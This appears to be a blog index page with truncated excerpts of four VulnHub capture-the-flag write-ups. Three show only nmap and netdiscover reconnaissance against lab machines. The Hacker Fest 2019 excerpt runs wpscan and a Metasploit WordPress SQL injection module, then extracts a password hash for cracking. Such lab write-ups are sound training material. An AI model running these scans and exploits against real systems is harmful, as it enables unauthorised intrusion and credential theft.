Vulnerable Machine Writeup * VULNHUB

HA ISRO (VULNHUB)

Link: https://drive.google.com/file/d/1QgmeUi0GmLESYUdojhE_x4TH9lyAiMuF/view root@kali:~# nmap -A 192.168.222.151 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-23 15:41 GMT Nmap scan report for 192.168.222.151 Host is up (0.00025s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:d2:c5:ec:a5:f9:c4:f3:8a:70:f6:df:ac:ad:a9:24 (RSA) | 256 34:ae:7a:6f:94:93:25:de:39:e3:14:b0:61:80:34:54 […]

Vulnerable Machine Writeup * VULNHUB

SILKY-CTF 0x01 (VULNHUB)

LINK: https://download.vulnhub.com/silky/Silky-CTF_0x01.ova root@kali:~# netdiscover -i eth0 Currently scanning: 192.168.118.0/16 | Screen View: Unique Hosts 7 Captured ARP Req/Rep packets, from 3 hosts. Total size: 420 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname —————————————————————————– 192.168.222.2 00:50:56:ea:c4:b4 4 240 VMware, Inc. 192.168.222.141 00:0c:29:6f:21:8c 2 120 VMware, Inc. 192.168.222.254 00:50:56:ec:ed:df 1 60 VMware, Inc. […]

Vulnerable Machine Writeup * VULNHUB

HA NARUTO (VULNHUB)

LINK: https://drive.google.com/file/d/1RK6ZdBstyw886OmpExUItK4_soMLMUxD/view?usp=sharing root@kali:~/.ssh# nmap -A 192.168.222.152 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 08:18 GMT Nmap scan report for 192.168.222.152 Host is up (0.00017s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:8d:8b:ee:53:c1:b1:86:9a:a8:fd:2a:af:82:bd:24 (RSA) | 256 e6:86:b7:62:d8:de:17:8e:df:df:ec:43:42:74:e5:21 […]

Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova root@kali:~# nmap -A 192.168.0.20 port : 21 , 22 , 80 , 10000 Enumeration : http://192.168.0.20 now on terminal root@kali:~# wpscan –url http://192.168.0.20/ WordPress Google maps Sqli Exploit : msf5 > use auxiliary/admin/http/wp google_maps_sqlimsf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit we get the output webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl root@kali:~# gedit hash webmaster […]